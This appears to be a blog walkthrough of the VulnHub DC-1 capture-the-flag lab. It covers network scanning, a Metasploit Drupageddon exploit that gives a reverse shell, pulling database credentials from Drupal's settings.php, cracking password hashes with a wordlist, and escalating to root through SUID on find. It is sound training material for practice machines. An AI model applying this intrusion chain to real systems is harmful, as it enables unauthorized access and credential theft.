VulnHub DC-1

Vulnhub DC-1 CTF Hacking Challenge. With DC-1 machine from Vulnhub we learn Hacking a bit more closely like you are hacking a real machine.

I have discussed all the steps and screenshots along with the output here , which will reduce any confusion , the writeup may seem long due to many screenshots but is actually a 10 minutes to do thing.

Download the VulnHub DC-1 Machine – https://www.vulnhub.com/entry/dc-1,292/

Discover machine on network by netdiscover or nmap range scanning
netdiscover your whole network or if you know the interface on which vmware is connected vmnet0, vmnet1 (Host-Only) or vmnet8(NAT)
netdiscover -i vmnet8
Added machine IP to /hosts file with name dc-1
now run nmap scan to get what are the ports open, services running and their version numbers

Now on running the nmap command in terminal the Output is

nmap scan of dc-1

So from above nmap result we see we have Drupal 7 hosted at port 80
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Debian)) Running Drupal
111/tcp open rpcbind 2-4 (RPC #100000)

We have some attack surface here and we proceed with Drupal, opening the Mahcine IP in our browser to explore Drupal 7.
We can try some user enumeration to see if we are lucky on Drupal Login page.
Or jump to exploits to see if we have anything in our arsenal against Drupal 7.

Vulnhub DC-1 Drupal 7

In metasploit we search Drupal Exploits

Search drupal in metasploit

From the list we get, we choose one of the exploits and use it by use exploit

We should choose one with Rank Excellent, altough not mandatory.
So we choose – > exploit/multi/http/drupal_drupageddon
in msfconsole type – use exploit/multi/http/drupal_drupageddon
To see available options in this particular exploit type show options.

set RHOST as dc-1 or the machine IP

Now we are all set to launch the exploit so type run or exploit.

Finally we have a reverse meterpreter shell here.So once we are in the machine the one thing to do is find who you are : user, this will let us know our permission. Type getuid

Going through files in current directory by ‘ls’ gave us our first flag1.txt

flag1

Viewing the contents of flag1.txt we get another hint. Pointing towards the Drupal CMS Config file.

I searched on Google to know that Drupal Config File is at – sites/default/settings.php

We view the content of file settings.php again we type cat settings.php

Here we get our second flag on top of the file, which is also the username and password to drupal database of dc-1

Brute force and dictionary attacks aren’t the only ways to gain access (and you WILL need access). What can you do with these credentials?

We spawn a python shell to access database, a ttp or pseudo-tty shell.

We browse the drupal database now. Find something worth here.

So we explore drupal db further, we might have some usernames and passwords here.

We check the users table if we get anything here.

So we have username and password in hash form here which we will ofcourse try to decode by hashcat or any other application of your choice, which you prefer.

I have copied the hash into a seperate file say hash.txt and I will use one of the Kali Linux default wordlist – rockyou.txt. You can locate rockyou .txt by locate rockyou.txt

After the hash is decrypted we know the admins password is – 53cr3t

So now we login to Drupal Website of dc-1 and explore further , under contents menu we find the third flag – flag3 which says

Special PERMS will help FIND the passwd – but you’ll need to -exec that command to work out how to get what’s in the shadow.

The SUID bit allows an application to be run as root, even when a different user is running it. So run the command to find out.

So we see find command has SUID bit set, means we can execute find command as root, we earlier saw we are actually www-data , but executing find will run it as root.

We take a look at passwd file, that is always an interesting thing to do in Linux.

Guess what, we see flag4 in passwd file. So we again crack the password , which is a hash. Same as earlier use john or hashcat….

the flag4 values are altered in pic because I was having fun with the machine.

Now the final flag, lets navigate to /root. and We see an error, so lets elevate our privileges. Lets check if we can.

now check user by whoami — and we are root
Lets get the final flag.

So this Vulnhub machine is done, we will post more interesting CTFs soon. and each steps in every CTF will be covered in detail in a separate post.

What Do You Think on This ? Say Here